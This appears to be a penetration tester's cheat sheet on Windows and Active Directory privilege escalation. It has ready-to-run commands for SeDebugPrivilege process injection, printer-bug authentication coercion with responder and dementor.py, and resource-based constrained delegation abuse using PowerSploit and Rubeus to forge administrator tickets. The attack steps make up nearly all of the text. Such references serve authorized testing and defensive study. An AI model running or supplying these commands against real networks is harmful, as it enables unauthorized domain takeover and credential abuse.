Privilege Escalation
The adversary is trying to gain higher-level permissions. https://attack.mitre.org/tactics/TA0004/
Process Elevation (via SeDebugPrivilege)
If you run whoami /priv and you see SeDebugPrivilege set to Enabled, you can assume you already have SYSTEM. One way of doing it is using decoder's psgetsys.ps1 script once you have a good idea on a PID to inject:
. .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(7864, 'C:\temp\payload.exe');
You can also gain a MSF session and use the module windows/manage/payload_inject with a PID of your choice.
Attacking spoolss ("The Printer Bug")
From a host with unconstrained delegation, "the printer bug" and dementor.py can be used to coerce the target host into authenticating to us (running responder) so that its TGT is relayed to us, after which we can generate a TGS for any user on that target host:
## set up a relay with responder:
responder -I tun0 --lm # tun0 = 10.10.15.123
## execute exploit through:
proxychains python dementor.py -u xsvc -p 'S3cur3PW123' -d 'burmat.local' 10.10.15.123 10.10.10.123
GenericWrite to Host + User SPN = PWN
If we have GenericWrite privileges over a host and we are a user that has an SPN, we can write our SID to the msDS-AllowedToActOnBehalfOfOtherIdentity property of that AD object using PowerSploit and forge tickets as anyone we like. You can read more about it here: https://alsid.com/company/news/kerberos-resource-based-constrained-delegation-new-control-path
## we can write our delegation attribute to the DC with the following:
$UserSid = Get-DomainUser svc_burmat -Properties objectsid | Select -Expand objectsid;
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($UserSid))";
$SDBytes = New-Object byte[] ($SD.BinaryLength);
$SD.GetBinaryForm($SDBytes, 0);
Get-DomainComputer websrv.burmat.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes};
## use rubeus to forge tickets as administrator accounts
rubeus.exe s4u /user:svc_burmat /ticket:doIFFDCCBRCg..SNIP.. /impersonateuser:administrator /msdsspn:cifs/websvr.burmat.local /ptt;